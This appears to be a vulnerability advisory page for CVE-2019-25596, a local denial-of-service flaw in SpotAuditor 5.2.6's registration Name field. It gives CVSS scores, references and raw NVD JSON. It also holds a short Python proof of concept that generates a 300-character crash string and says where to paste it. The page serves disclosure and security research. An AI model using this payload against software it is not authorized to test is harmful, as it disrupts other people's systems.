CVE-2019-25596

Description

SpotAuditor 5.2.6 contains a denial of service vulnerability in the registration dialog that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can paste a buffer of 300 repeated characters into the Name input during registration to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nsasoft:spotauditor:5.2.6:*:*:*:*:*:*:* - VULNERABLE

SpotAuditor 5.2.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2019-25596
# This script generates a payload to crash SpotAuditor 5.2.6

def generate_dos_payload():
    # Create a buffer with 300 repeated characters
    # This triggers the crash in the registration dialog Name field
    payload = "A" * 300
    return payload

if __name__ == "__main__":
    exploit = generate_dos_payload()
    print(f"Generated Payload: {exploit}")
    print("Paste this string into the Name field of SpotAuditor 5.2.6 registration dialog to trigger the DoS.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25596
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25596
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25596/
[4] VulDB https://vuldb.com/cve/CVE-2019-25596
[5] http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
[6] https://www.exploit-db.com/exploits/46778
[7] https://www.vulncheck.com/advisories/spotauditor-name-field-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25596", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.613", "lastModified": "2026-03-23T19:51:23.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SpotAuditor 5.2.6 contains a denial of service vulnerability in the registration dialog that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can paste a buffer of 300 repeated characters into the Name input during registration to trigger an application crash."}, {"lang": "es", "value": "SpotAuditor 5.2.6 contiene una vulnerabilidad de denegación de servicio en el diálogo de registro que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Nombre. Los atacantes pueden pegar un búfer de 300 caracteres repetidos en la entrada Nombre durante el registro para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nsasoft:spotauditor:5.2.6:*:*:*:*:*:*:*", "matchCriteriaId": "DB920581-C435-4A80-BCE5-F6391BC860BD"}]}]}], "references": [{"url": "http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/46778", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/spotauditor-name-field-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}